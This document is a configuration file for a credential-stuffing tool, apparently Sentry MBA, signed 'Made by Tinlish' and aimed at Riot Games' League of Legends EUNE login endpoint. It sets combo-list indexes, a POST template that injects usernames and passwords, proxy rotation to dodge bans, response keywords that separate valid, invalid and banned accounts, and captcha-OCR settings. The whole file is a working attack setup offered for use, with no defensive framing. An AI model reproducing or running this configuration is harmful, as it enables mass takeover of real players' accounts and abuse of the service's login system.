#Made by Tinlish
[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
75864264A93F0BB8730D818187CCE098=25

[Settings]
SiteURL=https://lq.eun1.lol.riotgames.com/login-queue/rest/queues/lol/authenticate
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
UsernameStart=6
UsernameEnd=8
PasswordStart=6
PasswordEnd=8
ComboMode=0
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
EmailFilter=0
EmailMode=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowProxies=10
BanWindowRatio=10
blnNoProxies=0
RequestMethod=2
Referer=0
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: app:/LolClient.swf/[[DYNAMIC]]/7|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=payload=user%3D<USER>%2Cpassword%3D<PASS>

[Fake]
AfterFP=1
FollowRedirect=0
EnableConHits=0
Success=3
ConHits=10
EnableConLength=0
SourceTags=1
ConLength=200
blnSuccess=0
SuccessRetries=3
blnForbToOK=1
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnCompleteNot=1
HTTPFollow=1
blnProcessErrors=1
blnInvalidPath=1
UserField=0

[Keywords]
HeaderFail=
HeaderSuccess=
HeaderBan=
HeaderRetry=
SourceFail=invalid_credentials","status":"FAILED;reason":"account_banned;reason":"account_transferred;","status":"FAILED
SourceSuccess=account_id":*,"account_name
SourceBan=
SourceRetry=
EnableHeaderFail=0
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderRetry=0
EnableSourceFail=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceRetry=0
EnableGlobalSourceRetry=1

[Form]
IAParse=0
blnBasic=0
Action=https://lq.eun1.lol.riotgames.com/login-queue/rest/queues/lol/authenticate
Username=
Password=
Email=
CustomData=
NoIndex=
AddData=payload=user%3D<USER>%2Cpassword%3D<PASS>
Cookie=__cfduid=d03767e1e6311718fb422f3fd0d37c33a1406369989689
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
RedPostData=
LoginPostData=
RedKeys=
DataDesc=
CaptureParsingCode=
RefreshSession=0
RefreshCookie=0
IAMethod=2
POSTMethod=2
RedMethod=1
LoginMethod=1
AjaxHeader=0
FormHeader=0
RedHeader=0
LoginHeader=0
ImageAfterAjax=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=header||Login Page||None||Costant||x-flash-version: 11,6,602,161||None||None||Username||||-1||-1||0||0||0||0
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&header&&None&&None&&None&&None
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng

